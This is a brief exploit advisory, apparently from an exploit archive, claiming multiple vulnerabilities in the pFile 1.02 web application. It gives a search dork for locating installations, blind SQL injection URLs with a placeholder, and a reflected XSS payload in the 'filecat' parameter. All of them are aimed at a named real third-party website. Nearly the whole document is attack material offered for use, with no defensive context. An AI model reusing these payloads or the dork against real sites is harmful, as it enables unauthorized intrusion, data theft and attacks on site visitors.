=============================== pfile_1.02 Mullti Vulnerability =============================== # Vendor: http://www.powie.de/wp-content/uploads/pfile_1.02.zip # Date: 2012-1-27 # Author : indoushka ######################################################## # Exploit By indoushka ------------- dork : pFile 1.02 © Thomas Schmidt, 2003 -- Thomas Ehrhardt, 2002-2011 -- blind SQL : http://www.edv-ssh.de/pfile/file.php?eintrag=0&filecat=0&id=%24%7binjecthere%7d (XSS/HTML Injection) http://www.edv-ssh.de/pfile/kommentar.php?filecat=%22%20onmouseover%3dprompt%28906466%29%20bad%3d%22&fileid=1 SQL injection http://www.edv-ssh.de/pfile/file.php?eintrag=0&filecat=0&id=%24{injecthere} ----------------------------------------------------------